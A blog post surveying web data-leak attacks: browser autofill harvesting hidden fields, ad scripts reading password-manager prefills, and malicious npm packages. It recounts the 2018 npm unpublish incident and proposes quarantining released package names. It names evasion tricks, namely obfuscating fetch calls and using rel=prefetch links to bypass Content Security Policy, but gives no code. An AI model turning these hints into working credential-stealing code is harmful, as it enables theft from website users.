👋 This post also got published on Medium. If you like it, please give it
some love over there.
Late 2016, Stoyan Stefanov published “Oversharing with the browser’s autofill”. It’s an article on stealing personal data using the browsers their form autofill feature. The attack works by
leveraging the fact that autocompletion will also complete fields which are visually hidden.
Note: it was only in January 2017 that this type of exploit gained traction, and was accredited to the wrong person (see this ZDNet article for example). As Stoyan points out in his article: it’s been warned about as early since 2013.
If it’s a comfort: it’s not until you enter data in one field and successively choose to autocomplete, that you’re leaking data.
Fast forward to late 2017: In “No boundaries for user identities: Web trackers exploit browser login managers” the autocomplete feature of password managers is abused by rogue advertising scripts.
Since your password manager (and your browser itself) will prefill usernames and passwords, any script loaded can read these out and do whatever they want to with it. Unlike the autocomplete above this kind of leak will happen automatically .At least two advertising scripts have been identified to using this technique to collect usernames.
The only way to prevent this is that browsers return empty strings for autocompleted values when reading them in via
or at least present a confirm dialog (and pause the JS runtime) until approved.
In “I’m harvesting credit card numbers and passwords from your site. Here’s how.” David Gilbertson notched it up a little:
I can’t believe people spend so much time messing around with cross-site scripting to get code into a single site. It’s so easy to ship malicious code to thousands of websites, with a little help from my web developer friends.
I know, the previous attacks mentioned weren’t XSS attacks, yet one could perform them through after injecting a remote script 😉
All you have to do is write a successful NPM package which others will use. Popular ones are things like logging libraries (*), which have many many downloads. If you then release a version with some rogue code …
(*) Speaking of: my Colored Line Formatter for Monolog has surpassed 250K downloads this week!
Would this kind of hack code be detected easily? Not really. The versions that get published on NPM are compiled and minified versions which are nowhere to be found in the source repo. Above that the compiled code can be obfuscated, so that words like
fetch don’t appear in it. And requests performed via dynamically injected links that have a
rel="prefetch" attribute set can bypass Content Security Policies.
One of the packages missing – namely
pinkie-promise – is used in
eslint, which itself is used just about everywhere. Installing dependencies in React-based apps didn’t work anymore because of this.
By now the issue has been resolved (postmortem here), yet the window between
Jan 06, 2018 - 19:45 UTC (identified) and
Jan 06, 2018 - 21:58 UTC (resolved) was a very dangerous one. In said window any developer could release (and have released!) packages with the same name. Mostly they were re-publishes of the actual thing, yet one could’ve also published rogue versions such as the ones described above.
NPM is already fighting name squatters by disallowing variants with punctuations and promoting the use of username-scoped packages, but I personally think an extra feat is missing: upon unpublishing of a package (be it by accident or not), its name should be quarantined for 30 days. In that 30 day window no NPM user other than the original one should be able to republish a package having the same name. Additionally there should be an option for the original author to release or transfer a package name to another NPM user.
I don’t run ads on my blog nor do I do this for profit. A donation however would always put a smile on my face though. Thanks!